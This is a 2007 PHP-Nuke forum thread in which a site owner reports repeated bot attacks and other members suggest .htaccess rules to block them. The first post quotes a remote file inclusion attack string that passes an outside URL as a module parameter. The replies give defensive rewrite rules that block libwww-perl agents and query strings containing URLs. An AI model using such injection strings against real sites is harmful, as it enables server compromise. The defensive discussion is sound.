You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 50 guest(s) and 1 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Hacker not giving up [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

Hacker not giving up
 
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
Author Message
mtalley887
Sergeant
Sergeant


Joined: Dec 01, 2003
Posts: 149
PostPosted: Mon Nov 05, 2007 10:30 pm Reply with quoteBack to top
I'd like to know if anyone else is getting hit by some hacker or automated string that looks like this:

Code:
www.kodetech.com/nukea/modules.php?name=http://rumusic.chat.ru/rumusic.wav?


Sentinal has been blocking each ip used. I would like to block a range to put a stop to this but, each time it attacks it comes back with a completely different IP number outside the range it was using previously. Just today I've gotton hit 15 times.

Is there a way to stop this through .htaccess?

Any help would be appreciated.
Michael
Find all posts by mtalley887View user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12383
PostPosted: Mon Nov 05, 2007 11:26 pm Reply with quoteBack to top
It is an automated bot. These botnets use many compromised servers, so they are impossible to completely block.

If you haven't yet, disable libwwwperl by writing this in .htaccess

Code:

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]


That will stop most of them. Those that don't use libwww-perl, you'll still have to have Sentinel stop them

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Slackervaara
Captain
Captain


Joined: Sep 13, 2003
Posts: 303
PostPosted: Tue Nov 06, 2007 12:41 am Reply with quoteBack to top
I use in addition to the above I have this in .htaccess:

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

This takes: =http:\\ in the query string and have not disturbed my site after two months test.
Find all posts by SlackervaaraView user's profileSend private message
mtalley887
Sergeant
Sergeant


Joined: Dec 01, 2003
Posts: 149
PostPosted: Tue Nov 06, 2007 8:01 am Reply with quoteBack to top
Thanks to both of you. I've initiated both into my .htaccess file and will let you know how it turns out. Since posting this last night I've recieved an additional six more hits. Thanks to sentinal it's doing it's job.

Michael
Find all posts by mtalley887View user's profileSend private message
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view Nuke Cops Forum Index » Nuke Security
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.174 Seconds - 336 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::